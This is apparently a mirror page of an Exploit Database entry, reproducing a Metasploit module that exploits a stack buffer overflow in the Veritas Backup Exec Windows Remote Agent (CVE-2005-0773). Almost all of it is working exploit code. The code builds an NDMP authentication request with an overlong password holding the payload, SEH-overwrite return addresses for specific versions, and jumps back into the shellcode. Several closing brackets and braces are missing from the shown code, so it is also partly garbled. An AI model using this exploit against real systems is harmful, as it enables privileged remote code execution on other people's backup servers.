Veritas Backup Exec Windows – Remote Agent Overflow (Metasploit)

Exploit Database
107 阅读

作者： Metasploit

日期： 2010-07-03
类别：
- remote
平台：
- windows
来源：https://www.exploit-db.com/exploits/16332/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

# $Id: remote_agent.rb 9669 2010-07-03 03:13:45Z jduck $

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = GreatRanking

include Msf::Exploit::Remote::NDMP

def initialize(info = {})

super(update_info(info,

'Name' => 'Veritas Backup Exec Windows Remote Agent Overflow',

'Description'=> %q{

This module exploits a stack buffer overflow in the Veritas

BackupExec Windows Agent software. This vulnerability occurs

when a client authentication request is received with type

'3' and a long password argument. Reliable execution is

obtained by abusing the stack buffer overflow to smash a SEH

pointer.

'Author' => [ 'hdm' ],

'License'=> MSF_LICENSE,

'Version'=> '$Revision: 9669 $',

'References' =>

[

[ 'CVE', '2005-0773'],

[ 'OSVDB', '17624'],

[ 'BID', '14022'],

[ 'URL', 'http://www.idefense.com/application/poi/display?id=272&type=vulnerabilities'],

[ 'URL', 'http://seer.support.veritas.com/docs/276604.htm'],

'Privileged' => true,

'DefaultOptions' =>

{

'EXITFUNC' => 'process',

'Payload'=>

{

'Space'=> 1024,

'BadChars' => "\x00",

'StackAdjustment' => -3500,

'Targets'=>

[

'Veritas BE 9.0/9.1/10.0 (All Windows)',

{

'Platform' => 'win',

'Rets' => [ 0x0140f8d5, 0x014261b0 ],

[

'Veritas BE 9.0/9.1/10.0 (Windows 2000)',

{

'Platform' => 'win',

'Rets' => [ 0x75022ac4, 0x75022ac4 ],

'DefaultTarget'=> 0,

'DisclosureDate' => 'Jun 22 2005'))

register_options(

[

Opt::RPORT(10000)

], self.class)

end

def check

info = ndmp_info()

if (info and info['Version'])

print_status(" Vendor: #{info['Vendor']}")

print_status("Product: #{info['Product']}")

print_status("Version: #{info['Version']}")

if (info['Vendor'] =~ /VERITAS/i and info['Version'] =~ /^(4\.2|5\.1)$/)

return Exploit::CheckCode::Detected

end

return Exploit::CheckCode::Safe

end

def exploit

connect

print_status("Trying target #{target.name}...")

resp = ndmp_recv()

username = 'X' * 512

password = rand_text_alphanumeric(8192)

# Place our payload early in the request and jump backwards into it

password[ 3536 - payload.encoded.length, payload.encoded.length] = payload.encoded

# This offset is required for version 10.0

password[3536, 2] = "\xeb\x06"

password[3540, 4] = [ target['Rets'][1] ].pack('V')

password[3544, 5] = "\xe9" + [-1037].pack('V')

# This offset is required for version 9.0/9.1

password[4524, 2] = "\xeb\x06"

password[4528, 4] = [ target['Rets'][0] ].pack('V')

password[4532, 5] = "\xe9" + [-2025].pack('V')

# Create the authentication request

auth = [

1, # Sequence number

Time.now.to_i, # Current time

0, # Message type (request)

0x901, # Message name (connect_client_auth)

0, # Reply sequence number

0, # Error status

3# Authentication type

].pack('NNNNNNN') +

[ username.length ].pack('N') + username +

[ password.length ].pack('N') + password +

[ 4 ].pack('N')

print_status("Sending authentication request...")

ndmp_send(auth)

handler

disconnect

end